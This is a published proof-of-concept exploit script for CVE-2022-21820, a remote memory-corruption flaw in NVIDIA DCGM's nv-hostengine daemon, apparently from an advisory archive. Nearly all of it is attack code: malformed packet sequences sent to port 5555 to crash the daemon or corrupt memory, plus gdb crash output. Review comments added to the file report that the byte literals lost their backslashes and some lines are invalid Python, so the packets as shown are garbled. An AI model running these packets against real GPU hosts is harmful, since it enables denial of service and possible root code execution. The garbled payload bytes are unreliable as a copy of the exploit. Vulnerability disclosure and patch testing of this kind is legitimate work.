Authored by Jeremy Brown

NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health data. nv-hostengine is a daemon that by default listens on the loopback interface, but can also listen on the network for requests coming in on port 5555 (remote mgmt). A native client named DCGMI allows users to make requests to the daemon to support a variety of functions. Malformed packets can cause the daemon (running as root or user account) to crash or potentially result in code execution. Versions less than 2.3.5 are affected.

advisories | CVE-2022-21820

#!/usr/bin/python3
# -*- coding: UTF-8 -*-
#
# heart.py
#
# NVIDIA Data Center GPU Manager Remote Memory Corruption Vulnerability
#
# Jeremy Brown [jbrown3264/gmail]
#
# NVIDIA DCGM runs on machines with NVIDIA GPUs to gather telemetry and GPU health
# data. nv-hostengine is a daemon that by default listens on the loopback interface,
# but can also listen on the network for requests coming in on port 5555 (remote mgmt).
# A native client named DCGMI allows users to make requests to the daemon to support
# a variety of functions. Malformed packets can cause the daemon (running as root
# or user account) to crash or potentially result in code execution.
#
# More info: https://docs.nvidia.com/datacenter/dcgm/latest/index.html
#
# Tested on Ubuntu 20.04 x64 with package datacenter-gpu-manager v2.3.1 (< v2.3.5 affected)
#
# $ ./heart.py 10.0.0.201 --trigger pkt3_mem
#
# $ gdb `which nv-hostengine`
# (gdb) r -b ALL -n
# nv-hostengine running as non-root. Some functionality will be limited.
# Started host engine version 2.3.1 using port number: 5555
# ...
# Thread 2 "nv-hostengine" received signal SIGSEGV, Segmentation fault.
#
# (gdb) i r
# rax 0x7ffbb3dbd010 140719031046160
# rbx 0x7ffff771ac70 140737344810096
# rcx 0x7ffbb3dbd010 140719031046160
# rdx 0x424242420 17786217504
# rsi 0x7ffff771aee4 140737344810724
# rdi 0x7ffbb3dbd010 140719031046160
# rbp 0x7ffff771ac40 0x7ffff771ac40
# rsp 0x7ffff771abe8 0x7ffff771abe8
# r8 0x424242420 17786217504
# r9 0x0 0
# r10 0x7ffbb3dbd010 140719031046160
#
# CVE-2022-21820
#

import os
import sys
import argparse
import time
import shutil
import signal
import socket

# TCP port that Heart.run() connects to on the target host.
DEFAULT_PORT = 5555

# Byte prefix prepended to every packet defined below.
# NOTE(review): the byte literals in this section look like they lost their
# backslashes in transit (e.g. b'xadxbc...' is presumably b'\xad\xbc...'), and
# each "PKT_START +" line ends in a bare "+" with no line continuation, which
# is not valid Python as written. Restore these from the upstream copy rather
# than by hand - a single wrong byte silently changes what goes on the wire.
PKT_START = b'xadxbcxbcxad'

#
# Trigger #1: Memory Corruption via malformed packet 3
#
# Packets 1-3 are sent in order by Heart.run() when --trigger is 'pkt3_mem'.
TRIGGER_ONE_PKT_1 = PKT_START +
b'x01x00x00x00x11x00x00x00x00x01x00x00x00x00x00x00x0ax0fx08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00'

TRIGGER_ONE_PKT_2 = PKT_START +
b'x01x00x00x00x1ax00x00x00x00x02x00x00x00x00x00x00x0ax18x08x03x10x03x18x00x28x00x42x05xc2x01x02x08x00x48xa4xecxc4x94x81x83xf5x02'

# 0x84 maps to 'B' here and crashes with rdx/r8=0x424242420
TRIGGER_ONE_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01x00' +
b'x84' * 51 +
b'x00' * 488 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'

#
# Trigger #2: NULL ptr write via malformed packet 4
#
# Packets 1-4 are sent in order by Heart.run() when --trigger is 'pkt4_null'.
# The first two packets are shared with trigger #1.
TRIGGER_TWO_PKT_1 = TRIGGER_ONE_PKT_1

TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2

TRIGGER_TWO_PKT_3 = PKT_START +
b'x03x00x00x00x3ax03x00x00x00x01x00x00x00x00x00x00x0axb7x06x08x38x10x03x18x00x28x00x42xacx06xaax01xa8x06x28x03x00x01' +
b'x00' * 12 +
b'x01x00x00x00x01' +
b'x00' * 523 +
b'x19x00x00x00x9ex00x9fx00xa4x00xa0x00xa3x00xa2x00xa1x00x82x00x36x00x55x00x52x00x33x00x32x00x35x00x39x00x3ax00x3bx00x5ax00xfax00xfcx00xfbx00x01x00xf4x01x42x00x43' +
b'x00' * 207 +
b'x01x00x00x00'

# 0x79 triggers crash
TRIGGER_TWO_PKT_4 = PKT_START +
b'x04x00x00x00x1cx00x00x00x00x01x00x00x00x00x00x00x0ax1ax08x04x10x03x18' +
b'xff' * 9 +
b'x01' +
b'x79' +
b'x00x42x07xd2x01x04x08x03x10x00'

class Heart(object):
    """Send one of the predefined packet sequences to a target host.

    The instance is configured from the parsed command-line arguments:
    ``args.host`` is the host to connect to and ``args.trigger`` selects
    which packet sequence ``run()`` sends ('pkt3_mem' or 'pkt4_null').
    """

    def __init__(self, args):
        """Store the target host and selected trigger name from *args*."""
        self.host = args.host
        self.trigger = args.trigger

    def run(self):
        """Connect to the target and send the selected packet sequence.

        Returns:
            0 on success, -1 if no trigger was chosen, the socket could not
            be created or connected, or a packet could not be sent.
        """
        if self.trigger is None:
            print("error: choose which bug use via --trigger")
            return -1

        # Ordered packet sequence for each trigger name. A trigger name that
        # is not listed sends nothing, matching the previous behaviour.
        sequences = {
            'pkt3_mem': (
                TRIGGER_ONE_PKT_1,
                TRIGGER_ONE_PKT_2,
                TRIGGER_ONE_PKT_3,
            ),
            'pkt4_null': (
                TRIGGER_TWO_PKT_1,
                TRIGGER_TWO_PKT_2,
                TRIGGER_TWO_PKT_3,
                TRIGGER_TWO_PKT_4,
            ),
        }
        packets = sequences.get(self.trigger, ())

        sock = self.getSock()
        if sock is None:
            return -1

        # Close the socket on every exit path; previously it was leaked.
        try:
            try:
                sock.connect((self.host, DEFAULT_PORT))
            except OSError as error:
                print("connect() failed: %s\n" % error)
                return -1

            for number, pkt in enumerate(packets, start=1):
                if self.sendPacket(sock, pkt) < 0:
                    print("failed to send/recv packet %d\n" % number)
                    return -1
        finally:
            sock.close()

        print("done\n")

        return 0

    def getSock(self):
        """Create a TCP/IPv4 socket with a 2 second timeout.

        Returns:
            The new socket, or None if it could not be created.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(2)
        except OSError as error:
            print("socket() failed: %s\n" % error)
            return None

        return sock

    def sendPacket(self, sock, pkt):
        """Send *pkt* on *sock*, then try to read a reply of up to 256 bytes.

        Returns:
            -1 if sending failed, 0 otherwise. A failure while reading the
            reply is deliberately not treated as an error.
        """
        try:
            # sendall() keeps writing until the whole packet is out; a bare
            # send() may transmit only part of a larger packet.
            sock.sendall(pkt)
        except OSError as error:
            print("socket send error: %s\n" % error)
            return -1

        try:
            sock.recv(256)
        except OSError:
            # No reply (timeout or closed connection) is expected for
            # pkt3_mem, so it is ignored rather than reported.
            return 0

        return 0

def signalExit(signum, frame):
    """Signal handler that terminates the process with exit status -1.

    Both arguments are supplied by the signal machinery and are unused.
    """
    raise SystemExit(-1)

def arg_parse(argv=None):
    """Parse the command-line arguments.

    Args:
        argv: Optional list of argument strings. When None (the default),
            argparse reads the arguments from sys.argv.

    Returns:
        The parsed namespace with ``host`` (str) and ``trigger``
        ('pkt3_mem', 'pkt4_null', or None when the option is omitted).
    """
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
                        type=str,
                        help="target host")

    # The option string was previously passed twice, which listed the flag
    # twice in the --help output.
    parser.add_argument("--trigger",
                        type=str,
                        choices=['pkt3_mem', 'pkt4_null'],
                        help="which bug to trigger")

    return parser.parse_args(argv)

def main():
    """Script entry point: parse arguments, run, and set the exit status.

    Installs signalExit as the SIGINT handler, builds a Heart from the
    parsed arguments and runs it. The process exits with status -1 when
    run() reports a failure.
    """
    signal.signal(signal.SIGINT, signalExit)

    args = arg_parse()

    result = Heart(args).run()

    # run() returns 0 on success and -1 on failure. The previous check
    # (result > 0) could never be true, so failures exited with status 0.
    if result != 0:
        sys.exit(-1)

# Run main() only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()